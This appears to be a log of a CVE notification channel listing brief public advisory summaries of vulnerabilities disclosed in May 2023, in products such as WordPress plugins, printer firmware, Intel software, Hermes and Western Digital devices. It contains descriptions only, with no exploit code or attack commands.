| 2023-05-20 05:58:43 |
🚨 CVE-2023-2736The Groundhogg plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.7.9.8. This is due to missing nonce validation in the 'ajax_edit_contact' function. This makes it possible for authenticated attackers to receive the auto login link via shortcode and then modify the assigned user to the auto login link to elevate verified user privileges via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-05-20 05:58:42 |
🚨 CVE-2023-2645A vulnerability, which was classified as critical, was found in USR USR-G806 1.0.41. Affected is an unknown function of the component Web Management Page. The manipulation of the argument username/password with the input root leads to use of hard-coded password. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to change the configuration settings. VDB-228774 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-05-20 05:58:41 |
🚨 CVE-2023-25771Improper access control for some Intel(R) NUC BIOS firmware may allow a privileged user to potentially enable denial of service via local access.🎖@cveNotify |
|
| 2023-05-20 05:58:40 |
🚨 CVE-2023-0851Buffer overflow in CPCA Resource Download process of Office / Small Office Multifunction Printers and Laser Printers(*) which may allow an attacker on the network segment to trigger the affected product being unresponsive or to execute arbitrary code. *:Satera LBP660C Series/LBP620C Series/MF740C Series/MF640C Series firmware Ver.11.04 and earlier sold in Japan. Color imageCLASS LBP660C Series/LBP 620C Series/X LBP1127C/MF740C Series/MF640C Series/X MF1127C firmware Ver.11.04 and earlier sold in US. i-SENSYS LBP660C Series/LBP620C Series/MF740C Series/MF640C Series, C1127P, C1127iF, C1127i firmware Ver.11.04 and earlier sold in Europe.🎖@cveNotify |
|
| 2023-05-20 05:58:39 |
🚨 CVE-2023-0852Buffer overflow in the Address Book of Mobile Device function of Office / Small Office Multifunction Printers and Laser Printers(*) which may allow an attacker on the network segment to trigger the affected product being unresponsive or to execute arbitrary code. *:Satera LBP660C Series/LBP620C Series/MF740C Series/MF640C Series firmware Ver.11.04 and earlier sold in Japan. Color imageCLASS LBP660C Series/LBP 620C Series/X LBP1127C/MF740C Series/MF640C Series/X MF1127C firmware Ver.11.04 and earlier sold in US. i-SENSYS LBP660C Series/LBP620C Series/MF740C Series/MF640C Series, C1127P, C1127iF, C1127i firmware Ver.11.04 and earlier sold in Europe.🎖@cveNotify |
|
| 2023-05-20 05:58:34 |
🚨 CVE-2023-0854Buffer overflow in NetBIOS QNAME registering and communication process of Office / Small Office Multifunction Printers and Laser Printers(*) which may allow an attacker on the network segment to trigger the affected product being unresponsive or to execute arbitrary code. *:Satera LBP660C Series/LBP620C Series/MF740C Series/MF640C Series firmware Ver.11.04 and earlier sold in Japan. Color imageCLASS LBP660C Series/LBP 620C Series/X LBP1127C/MF740C Series/MF640C Series/X MF1127C firmware Ver.11.04 and earlier sold in US. i-SENSYS LBP660C Series/LBP620C Series/MF740C Series/MF640C Series, C1127P, C1127iF, C1127i firmware Ver.11.04 and earlier sold in Europe.🎖@cveNotify |
|
| 2023-05-20 05:58:33 |
🚨 CVE-2023-0855Buffer overflow in IPP number-up attribute process of Office / Small Office Multifunction Printers and Laser Printers(*) which may allow an attacker on the network segment to trigger the affected product being unresponsive or to execute arbitrary code. *:Satera LBP660C Series/LBP620C Series/MF740C Series/MF640C Series firmware Ver.11.04 and earlier sold in Japan. Color imageCLASS LBP660C Series/LBP 620C Series/X LBP1127C/MF740C Series/MF640C Series/X MF1127C firmware Ver.11.04 and earlier sold in US. i-SENSYS LBP660C Series/LBP620C Series/MF740C Series/MF640C Series, C1127P, C1127iF, C1127i firmware Ver.11.04 and earlier sold in Europe.🎖@cveNotify |
|
| 2023-05-20 05:58:32 |
🚨 CVE-2023-0856Buffer overflow in IPP sides attribute process of Office / Small Office Multifunction Printers and Laser Printers(*) which may allow an attacker on the network segment to trigger the affected product being unresponsive or to execute arbitrary code. *:Satera LBP660C Series/LBP620C Series/MF740C Series/MF640C Series firmware Ver.11.04 and earlier sold in Japan. Color imageCLASS LBP660C Series/LBP 620C Series/X LBP1127C/MF740C Series/MF640C Series/X MF1127C firmware Ver.11.04 and earlier sold in US. i-SENSYS LBP660C Series/LBP620C Series/MF740C Series/MF640C Series, C1127P, C1127iF, C1127i firmware Ver.11.04 and earlier sold in Europe.🎖@cveNotify |
|
| 2023-05-20 05:58:31 |
🚨 CVE-2023-29863Medical Systems Co. Medisys Weblab Products v19.4.03 was discovered to contain a SQL injection vulnerability via the tem:statement parameter in the WSDL files.🎖@cveNotify |
|
| 2023-05-20 05:58:27 |
🚨 CVE-2023-2649A vulnerability was found in Tenda AC23 16.03.07.45_cn. It has been declared as critical. This vulnerability affects unknown code of the file /bin/ate of the component Service Port 7329. The manipulation of the argument v2 leads to command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-228778 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-05-20 05:58:26 |
🚨 CVE-2023-2444A cross site request forgery vulnerability exists in Rockwell Automation's FactoryTalk Vantagepoint. This vulnerability can be exploited in two ways. If an attacker sends a malicious link to a computer that is on the same domain as the FactoryTalk Vantagepoint server and a user clicks the link, the attacker could impersonate the legitimate user and send requests to the affected product. Additionally, if an attacker sends an untrusted link to a computer that is not on the same domain as the server and a user opens the FactoryTalk Vantagepoint website, enters credentials for the FactoryTalk Vantagepoint server, and clicks on the malicious link a cross site request forgery attack would be successful as well.🎖@cveNotify |
|
| 2023-05-20 05:58:25 |
🚨 CVE-2023-25309Cross Site Scripting (XSS) Vulnerability in Fetlife rollout-ui version 0.5, allows attackers to execute arbitrary code via a crafted url to the delete a feature functionality.🎖@cveNotify |
|
| 2023-05-20 05:58:24 |
🚨 CVE-2023-30394MoveIT v1.1.11 was discovered to contain a cross-site scripting (XSS) vulenrability via the API authentication function.🎖@cveNotify |
|
| 2023-05-20 01:58:28 |
🚨 CVE-2023-28623Zulip is an open-source team collaboration tool with unique topic-based threading. In the event that 1: `ZulipLDAPAuthBackend` and an external authentication backend (any aside of `ZulipLDAPAuthBackend` and `EmailAuthBackend`) are the only ones enabled in `AUTHENTICATION_BACKENDS` in `/etc/zulip/settings.py` and 2: The organization permissions don't require invitations to join. An attacker can create a new account in the organization with an arbitrary email address in their control that's not in the organization's LDAP directory. The impact is limited to installations which have this specific combination of authentication backends as described above in addition to having `Invitations are required for joining this organization` organization permission disabled. This issue has been addressed in version 6.2. Users are advised to upgrade. Users unable to upgrade may enable the `Invitations are required for joining this organization` organization permission to prevent this issue.🎖@cveNotify |
|
| 2023-05-19 22:58:28 |
🚨 CVE-2023-32675Vyper is a pythonic Smart Contract Language for the ethereum virtual machine. In contracts with more than one regular nonpayable function, it is possible to send funds to the default function, even if the default function is marked `nonpayable`. This applies to contracts compiled with vyper versions prior to 0.3.8. This issue was fixed by the removal of the global `calldatasize` check in commit `02339dfda`. Users are advised to upgrade to version 0.3.8. Users unable to upgrade should avoid use of nonpayable default functions.🎖@cveNotify |
|
| 2023-05-19 22:58:27 |
🚨 CVE-2023-32679Craft CMS is an open source content management system. In affected versions of Craft CMS an unrestricted file extension may lead to Remote Code Execution. If the name parameter value is not empty string('') in the View.php's doesTemplateExist() -> resolveTemplate() -> _resolveTemplateInternal() -> _resolveTemplate() function, it returns directly without extension verification, so that arbitrary extension files are rendered as twig templates. When attacker with admin privileges on a DEV or an improperly configured STG or PROD environment, they can exploit this vulnerability to remote code execution. Code execution may grant the attacker access to the host operating system. This issue has been addressed in version 4.4.6. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-05-19 20:58:29 |
🚨 CVE-2023-29809SQL injection vulnerability found in Maximilian Vogt companymaps (cmaps) v.8.0 allows a remote attacker to execute arbitrary code via a crafted script in the request.🎖@cveNotify |
|
| 2023-05-19 20:58:28 |
🚨 CVE-2022-32114** DISPUTED ** An unrestricted file upload vulnerability in the Add New Assets function of Strapi 4.1.12 allows attackers to conduct XSS attacks via a crafted PDF file. NOTE: the project documentation suggests that a user with the Media Library "Create (upload)" permission is supposed to be able to upload PDF files containing JavaScript, and that all files in a public assets folder are accessible to the outside world (unless the filename begins with a dot character). The administrator can choose to allow only image, video, and audio files (i.e., not PDF) if desired.🎖@cveNotify |
|
| 2023-05-19 18:58:13 |
🚨 CVE-2023-31707SEMCMS 1.5 is vulnerable to SQL Injection via Ant_Rponse.php.🎖@cveNotify |
|
| 2023-05-19 18:58:12 |
🚨 CVE-2023-31757DedeCMS up to v5.7.108 is vulnerable to XSS in sys_info.php via parameters 'edit___cfg_powerby' and 'edit___cfg_beian'🎖@cveNotify |
|
| 2023-05-19 16:58:13 |
🚨 CVE-2023-31757DedeCMS up to v5.7.108 is vulnerable to XSS in sys_info.php via parameters 'edit___cfg_powerby' and 'edit___cfg_beian'🎖@cveNotify |
|
| 2023-05-19 16:58:12 |
🚨 CVE-2023-23313Certain Draytek products are vulnerable to Cross Site Scripting (XSS) via the wlogin.cgi script and user_login.cgi script of the router's web application management portal. This affects Vigor3910, Vigor1000B, Vigor2962 v4.3.2.1; Vigor2865 and Vigor2866 v4.4.1.0; Vigor2927 v4.4.2.2; and Vigor2915, Vigor2765, Vigor2766, Vigor2135 v4.4.2.0; Vigor2763 v4.4.2.1; Vigor2862 and Vigor2926 v3.9.9.0; Vigor2925 v3.9.3; Vigor2952 and Vigor3220 v3.9.7.3; Vigor2133 and Vigor2762 v3.9.6.4; and Vigor2832 v3.9.6.2.🎖@cveNotify |
|
| 2023-05-19 15:58:14 |
🚨 CVE-2023-31862jizhicms v2.4.6 is vulnerable to Cross Site Scripting (XSS). The content of the article published in the front end is only filtered in the front end, without being filtered in the background, which allows attackers to publish an article containing malicious JavaScript scripts by modifying the request package.🎖@cveNotify |
|
| 2023-05-19 15:58:13 |
🚨 CVE-2023-26818Telegram 9.3.1 and 9.4.0 allows attackers to access restricted files, microphone ,or video recording via the DYLD_INSERT_LIBRARIES flag.🎖@cveNotify |
|
| 2023-05-19 15:58:12 |
🚨 CVE-2023-33240Foxit PDF Reader (12.1.1.15289 and earlier) and Foxit PDF Editor (12.1.1.15289 and all previous 12.x versions, 11.2.5.53785 and all previous 11.x versions, and 10.1.11.37866 and earlier) on Windows allows Local Privilege Escalation when installed to a non-default directory because unprivileged users have access to an executable file of a system service. This is fixed in 12.1.2.🎖@cveNotify |
|
| 2023-05-19 10:58:14 |
🚨 CVE-2023-2806A vulnerability classified as problematic was found in Weaver e-cology up to 9.0. Affected by this vulnerability is the function RequestInfoByXml of the component API. The manipulation leads to xml external entity reference. The associated identifier of this vulnerability is VDB-229411. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-05-19 10:58:13 |
🚨 CVE-2023-33240Foxit PDF Reader (12.1.1.15289 and earlier) and Foxit PDF Editor (12.1.1.15289 and all previous 12.x versions, 11.2.5.53785 and all previous 11.x versions, and 10.1.11.37866 and earlier) on Windows allows Local Privilege Escalation when installed to a non-default directory because unprivileged users have access to an executable file of a system service. This is fixed in 12.1.2.🎖@cveNotify |
|
| 2023-05-19 10:58:12 |
🚨 CVE-2023-29827** DISPUTED ** ejs v3.1.9 is vulnerable to server-side template injection. If the ejs file is controllable, template injection can be implemented through the configuration settings of the closeDelimiter parameter. NOTE: this is disputed by the vendor because the render function is not intended to be used with untrusted input.🎖@cveNotify |
|
| 2023-05-19 05:58:25 |
🚨 CVE-2023-2704The BP Social Connect plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.5. This is due to insufficient verification on the user being supplied during a Facebook login through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email.🎖@cveNotify |
|
| 2023-05-19 05:58:24 |
🚨 CVE-2023-24805cups-filters contains backends, filters, and other software required to get the cups printing service working on operating systems other than macos. If you use the Backend Error Handler (beh) to create an accessible network printer, this security vulnerability can cause remote code execution. `beh.c` contains the line `retval = system(cmdline) >> 8;` which calls the `system` command with the operand `cmdline`. `cmdline` contains multiple user controlled, unsanitized values. As a result an attacker with network access to the hosted print server can exploit this vulnerability to inject system commands which are executed in the context of the running server. This issue has been addressed in commit `8f2740357` and is expected to be bundled in the next release. Users are advised to upgrade when possible and to restrict access to network printers in the meantime.🎖@cveNotify |
|
| 2023-05-19 05:58:21 |
🚨 CVE-2023-1729A flaw was found in LibRaw. A heap-buffer-overflow in raw2image_ex() caused by a maliciously crafted file may lead to an application crash.🎖@cveNotify |
|
| 2023-05-19 05:58:20 |
🚨 CVE-2023-2667A vulnerability has been found in SourceCodester Lost and Found Information System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file admin/. The manipulation of the argument page leads to cross site scripting. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-228883.🎖@cveNotify |
|
| 2023-05-19 05:58:19 |
🚨 CVE-2023-2669A vulnerability was found in SourceCodester Lost and Found Information System 1.0. It has been classified as critical. This affects an unknown part of the file admin/?page=categories/view_category of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The identifier VDB-228885 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-05-19 05:58:18 |
🚨 CVE-2023-2670A vulnerability was found in SourceCodester Lost and Found Information System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file admin/?page=user/manage_user. The manipulation leads to improper access controls. The attack can be initiated remotely. VDB-228886 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-05-19 05:58:15 |
🚨 CVE-2023-2671A vulnerability was found in SourceCodester Lost and Found Information System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file classes/Master.php?f=save_inquiry of the component Contact Form. The manipulation of the argument fullname/contact/message leads to cross site scripting. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-228887.🎖@cveNotify |
|
| 2023-05-19 05:58:14 |
🚨 CVE-2023-25776Improper input validation in some Intel(R) Server Board BMC firmware before version 2.90 may allow a privileged user to enable information disclosure via local access.🎖@cveNotify |
|
| 2023-05-19 05:58:13 |
🚨 CVE-2023-25568Boxo, formerly known as go-libipfs, is a library for building IPFS applications and implementations. In versions 0.4.0 and 0.5.0, if an attacker is able allocate arbitrary many bytes in the Bitswap server, those allocations are lasting even if the connection is closed. This affects users accepting untrusted connections with the Bitswap server and also affects users using the old API stubs at `github.com/ipfs/go-libipfs/bitswap` because users then transitively import `github.com/ipfs/go-libipfs/bitswap/server`. Boxo versions 0.6.0 and 0.4.1 contain a patch for this issue. As a workaround, those who are using the stub object at `github.com/ipfs/go-libipfs/bitswap` not taking advantage of the features provided by the server can refactor their code to use the new split API that will allow them to run in a client only mode: `github.com/ipfs/go-libipfs/bitswap/client`.🎖@cveNotify |
|
| 2023-05-19 00:58:39 |
🚨 CVE-2023-23569Stack-based buffer overflow for some Intel(R) Trace Analyzer and Collector software before version 2021.8.0 published Dec 2022 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-05-19 00:58:38 |
🚨 CVE-2023-23580Stack-based buffer overflow for some Intel(R) Trace Analyzer and Collector software before version 2021.8.0 published Dec 2022 may allow an authenticated user to potentially escalation of privilege via local access.🎖@cveNotify |
|
| 2023-05-19 00:58:37 |
🚨 CVE-2023-23909Out-of-bounds read for some Intel(R) Trace Analyzer and Collector software before version 2021.8.0 published Dec 2022 may allow an authenticated user to potentially enable information disclosure via local access.🎖@cveNotify |
|
| 2023-05-19 00:58:36 |
🚨 CVE-2023-23910Out-of-bounds write for some Intel(R) Trace Analyzer and Collector software before version 2021.8.0 published Dec 2022 may allow an authenticated user to potentially escalation of privilege via local access.🎖@cveNotify |
|
| 2023-05-19 00:58:35 |
🚨 CVE-2023-28411Double free in some Intel(R) Server Board BMC firmware before version 2.90 may allow a privileged user to enable information disclosure via local access.🎖@cveNotify |
|
| 2023-05-19 00:58:33 |
🚨 CVE-2022-37409Insufficient control flow management for the Intel(R) IPP Cryptography software before version 2021.6 may allow an authenticated user to potentially enable information disclosure via local access.🎖@cveNotify |
|
| 2023-05-19 00:58:32 |
🚨 CVE-2022-38087Exposure of resource to wrong sphere in BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable information disclosure via local access.🎖@cveNotify |
|
| 2023-05-19 00:58:31 |
🚨 CVE-2022-32582Improper access control in firmware for some Intel(R) NUC Boards, Intel(R) NUC 11 Performance Kit, Intel(R) NUC 11 Performance Mini PC, Intel(R) NUC Pro Compute Element may allow a privileged user to potentially enable denial of service via local access.🎖@cveNotify |
|
| 2023-05-19 00:58:30 |
🚨 CVE-2022-32766Improper input validation for some Intel(R) BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-05-19 00:58:25 |
🚨 CVE-2023-1195A use-after-free flaw was found in reconn_set_ipaddr_from_hostname in fs/cifs/connect.c in the Linux kernel. The issue occurs when it forgets to set the free pointer server->hostname to NULL, leading to an invalid pointer request.🎖@cveNotify |
|
| 2023-05-19 00:58:24 |
🚨 CVE-2023-23556An error in BigInt conversion to Number in Hermes prior to commit a6dcafe6ded8e61658b40f5699878cd19a481f80 could have been used by a malicious attacker to execute arbitrary code due to an out-of-bound write. Note that this bug is only exploitable in cases where Hermes is used to execute untrusted JavaScript. Hence, most React Native applications are not affected.🎖@cveNotify |
|
| 2023-05-19 00:58:23 |
🚨 CVE-2023-23759There is a vulnerability in the fizz library prior to v2023.01.30.00 where a CHECK failure can be triggered remotely. This behavior requires the client supported cipher advertisement changing between the original ClientHello and the second ClientHello, crashing the process (impact is limited to denial of service).🎖@cveNotify |
|
| 2023-05-19 00:58:22 |
🚨 CVE-2023-24832A null pointer dereference bug in Hermes prior to commit 5cae9f72975cf0e5a62b27fdd8b01f103e198708 could have been used by an attacker to crash an Hermes runtime where the EnableHermesInternal config option was set to true. Note that this is only exploitable in cases where Hermes is used to execute untrusted JavaScript. Hence, most React Native applications are not affected.🎖@cveNotify |
|
| 2023-05-19 00:58:18 |
🚨 CVE-2023-24833A use-after-free in BigIntPrimitive addition in Hermes prior to commit a6dcafe6ded8e61658b40f5699878cd19a481f80 could have been used by an attacker to leak raw data from Hermes VM’s heap. Note that this is only exploitable in cases where Hermes is used to execute untrusted JavaScript. Hence, most React Native applications are not affected.🎖@cveNotify |
|
| 2023-05-19 00:58:17 |
🚨 CVE-2023-25933A type confusion bug in TypedArray prior to commit e6ed9c1a4b02dc219de1648f44cd808a56171b81 could have been used by a malicious attacker to execute arbitrary code via untrusted JavaScript. Note that this is only exploitable in cases where Hermes is used to execute untrusted JavaScript. Hence, most React Native applications are not affected.🎖@cveNotify |
|
| 2023-05-19 00:58:16 |
🚨 CVE-2023-28081A bytecode optimization bug in Hermes prior to commit e6ed9c1a4b02dc219de1648f44cd808a56171b81 could be used to cause an use-after-free and obtain arbitrary code execution via a carefully crafted payload. Note that this is only exploitable in cases where Hermes is used to execute untrusted JavaScript. Hence, most React Native applications are not affected.🎖@cveNotify |
|
| 2023-05-19 00:58:15 |
🚨 CVE-2023-28753netconsd prior to v0.2 was vulnerable to an integer overflow in its parse_packet function. A malicious individual could leverage this overflow to create heap memory corruption with attacker controlled data.🎖@cveNotify |
|
| 2023-05-19 00:58:14 |
🚨 CVE-2023-30470A use-after-free related to unsound inference in the bytecode generation when optimizations are enabled for Hermes prior to commit da8990f737ebb9d9810633502f65ed462b819c09 could have been used by an attacker to achieve remote code execution. Note that this is only exploitable in cases where Hermes is used to execute untrusted JavaScript. Hence, most React Native applications are not affected.🎖@cveNotify |
|
| 2023-05-18 22:58:18 |
🚨 CVE-2022-36326An uncontrolled resource consumption vulnerability issue that could arise by sending crafted requests to a service to consume a large amount of memory, eventually resulting in the service being stopped and restarted was discovered in Western Digital My Cloud Home, My Cloud Home Duo, SanDisk ibi and Western Digital My Cloud OS 5 devices. This issue requires the attacker to already have root privileges in order to exploit this vulnerability.This issue affects My Cloud Home and My Cloud Home Duo: before 9.4.0-191; ibi: before 9.4.0-191; My Cloud OS 5: before 5.26.202.🎖@cveNotify |
|
| 2023-05-18 22:58:17 |
🚨 CVE-2022-36328Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could allow an attacker to create arbitrary shares on arbitrary directories and exfiltrate sensitive files, passwords, users and device configurations was discovered in Western Digital My Cloud Home, My Cloud Home Duo, SanDisk ibi and Western Digital My Cloud OS 5 devices. This can only be exploited once an attacker gains root privileges on the devices using an authentication bypass issue or another vulnerability.This issue affects My Cloud Home and My Cloud Home Duo: before 9.4.0-191; ibi: before 9.4.0-191; My Cloud OS 5: before 5.26.202.🎖@cveNotify |
|
| 2023-05-18 20:58:21 |
🚨 CVE-2023-30256Cross Site Scripting vulnerability found in Webkil QloApps v.1.5.2 allows a remote attacker to obtain sensitive information via the back and email_create parameters in the AuthController.php file.🎖@cveNotify |
|
| 2023-05-18 20:58:20 |
🚨 CVE-2022-36326An uncontrolled resource consumption vulnerability issue that could arise by sending crafted requests to a service to consume a large amount of memory, eventually resulting in the service being stopped and restarted was discovered in Western Digital My Cloud Home, My Cloud Home Duo, SanDisk ibi and Western Digital My Cloud OS 5 devices. This issue requires the attacker to already have root privileges in order to exploit this vulnerability.This issue affects My Cloud Home and My Cloud Home Duo: before 9.4.0-191; ibi: before 9.4.0-191; My Cloud OS 5: before 5.26.202.🎖@cveNotify |
|
| 2023-05-18 20:58:19 |
🚨 CVE-2022-36327Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could allow an attacker to write files to locations with certain critical filesystem types leading to remote code execution was discovered in Western Digital My Cloud Home, My Cloud Home Duo, SanDisk ibi and Western Digital My Cloud OS 5 devices.This issue affects My Cloud Home and My Cloud Home Duo: before 9.4.0-191; ibi: before 9.4.0-191; My Cloud OS 5: before 5.26.202.🎖@cveNotify |
|
| 2023-05-18 20:58:18 |
🚨 CVE-2022-36328Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could allow an attacker to create arbitrary shares on arbitrary directories and exfiltrate sensitive files, passwords, users and device configurations was discovered in Western Digital My Cloud Home, My Cloud Home Duo, SanDisk ibi and Western Digital My Cloud OS 5 devices. This can only be exploited once an attacker gains root privileges on the devices using an authentication bypass issue or another vulnerability.This issue affects My Cloud Home and My Cloud Home Duo: before 9.4.0-191; ibi: before 9.4.0-191; My Cloud OS 5: before 5.26.202.🎖@cveNotify |
|
| 2023-05-18 20:58:16 |
🚨 CVE-2023-31597An issue in Zammad v5.4.0 allows attackers to bypass e-mail verification using an arbitrary address and manipulate the data of the generated user. Attackers are also able to gain unauthorized access to existing tickets.🎖@cveNotify |
|
| 2023-05-18 20:58:15 |
🚨 CVE-2022-29840Server-Side Request Forgery (SSRF) vulnerability that could allow a rogue server on the local network to modify its URL to point back to the loopback adapter was addressed in Western Digital My Cloud OS 5 devices. This could allow the URL to exploit other vulnerabilities on the local server.This issue affects My Cloud OS 5 devices before 5.26.202.🎖@cveNotify |
|
| 2023-05-18 20:58:14 |
🚨 CVE-2022-3515A vulnerability was found in the Libksba library due to an integer overflow within the CRL parser. The vulnerability can be exploited remotely for code execution on the target system by passing specially crafted data to the application, for example, a malicious S/MIME attachment.🎖@cveNotify |
|
| 2023-05-18 20:58:13 |
🚨 CVE-2022-47629Libksba before 1.6.3 is prone to an integer overflow vulnerability in the CRL signature parser.🎖@cveNotify |
|
| 2023-05-18 19:58:39 |
🚨 CVE-2020-14656Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Locking). Supported versions that are affected are 8.0.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-05-18 19:58:38 |
🚨 CVE-2020-14651Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Roles). Supported versions that are affected are 8.0.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.1 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H).🎖@cveNotify |
|
| 2023-05-18 19:58:37 |
🚨 CVE-2020-14643Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Roles). Supported versions that are affected are 8.0.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.1 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H).🎖@cveNotify |
|
| 2023-05-18 19:58:36 |
🚨 CVE-2020-14597Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-05-18 19:58:35 |
🚨 CVE-2022-41771Incorrect permission assignment for critical resource in some Intel(R) QAT drivers for Windows before version 1.9.0 may allow an authenticated user to potentially enable information disclosure via local access.🎖@cveNotify |
|
| 2023-05-18 19:58:31 |
🚨 CVE-2022-41808Improper buffer restriction in software for the Intel QAT Driver for Linux before version 1.7.l.4.12 may allow an authenticated user to potentially enable denial of service via local access.🎖@cveNotify |
|
| 2023-05-18 19:58:30 |
🚨 CVE-2023-2800Insecure Temporary File in GitHub repository huggingface/transformers prior to 4.30.0.🎖@cveNotify |
|
| 2023-05-18 19:58:29 |
🚨 CVE-2023-32322Ombi is an open source application which allows users to request specific media from popular self-hosted streaming servers. Versions prior to 4.38.2 contain an arbitrary file read vulnerability where an Ombi administrative user may access files available to the Ombi server process on the host operating system. Ombi administrators may not always be local system administrators and so this may violate the security expectations of the system. The arbitrary file read vulnerability was present in `ReadLogFile` and `Download` endpoints in `SystemControllers.cs` as the parameter `logFileName` is not sanitized before being combined with the `Logs` directory. When using `Path.Combine(arg1, arg2, arg3)`, an attacker may be able to escape to folders/files outside of `Path.Combine(arg1, arg2)` by using ".." in `arg3`. In addition, by specifying an absolute path for `arg3`, `Path.Combine` will completely ignore the first two arguments and just return just `arg3`. This vulnerability can lead to information disclosure. The Ombi `documentation` suggests running Ombi as a Service with Administrator privileges. An attacker targeting such an application may be able to read the files of any Windows user on the host machine and certain system files. This issue has been addressed in commit `b8a8f029` and in release version 4.38.2. Users are advised to upgrade. There are no known workarounds for this vulnerability. This issue is also tracked as GHSL-2023-088.🎖@cveNotify |
|
| 2023-05-18 19:58:27 |
🚨 CVE-2022-40210Exposure of data element to wrong session in the Intel DCM software before version 5.0.1 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-05-18 19:58:23 |
🚨 CVE-2022-40685Insufficiently protected credentials in the Intel(R) DCM software before version 5.0.1 may allow an authenticated user to potentially enable information disclosure via network access.🎖@cveNotify |
|
| 2023-05-18 19:58:22 |
🚨 CVE-2022-25976Improper input validation in the Intel(R) VROC software before version 7.7.6.1003 may allow an authenticated user to potentially enable denial of service via local access.🎖@cveNotify |
|
| 2023-05-18 19:58:21 |
🚨 CVE-2022-30338Incorrect default permissions in the Intel(R) VROC software before version 7.7.6.1003 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-05-18 19:58:20 |
🚨 CVE-2022-29919Use after free in the Intel(R) VROC software before version 7.7.6.1003 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-05-18 19:58:16 |
🚨 CVE-2021-26397Insufficient address validation, may allow anattacker with a compromised ABL and UApp to corrupt sensitive memory locationspotentially resulting in a loss of integrity or availability.🎖@cveNotify |
|
| 2023-05-18 19:58:15 |
🚨 CVE-2023-2799A vulnerability, which was classified as problematic, has been found in cnoa OA up to 5.1.1.5. Affected by this issue is some unknown functionality of the file /index.php?app=main&func=passport&action=login. The manipulation leads to use of hard-coded password. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-229376. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-05-18 19:58:14 |
🚨 CVE-2023-32243Improper Authentication vulnerability in WPDeveloper Essential Addons for Elementor allows Privilege Escalation. This issue affects Essential Addons for Elementor: from 5.4.0 through 5.7.1.🎖@cveNotify |
|
| 2023-05-18 19:58:13 |
🚨 CVE-2023-28528IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the invscout command to execute arbitrary commands. IBM X-Force ID: 251207.🎖@cveNotify |
|
| 2023-05-18 19:58:12 |
🚨 CVE-2018-0598Untrusted search path vulnerability in Self-extracting archive files created by IExpress bundled with Microsoft Windows allows an attacker to gain privileges via a Trojan horse DLL in an unspecified directory.🎖@cveNotify |
|
| 2023-05-18 17:58:19 |
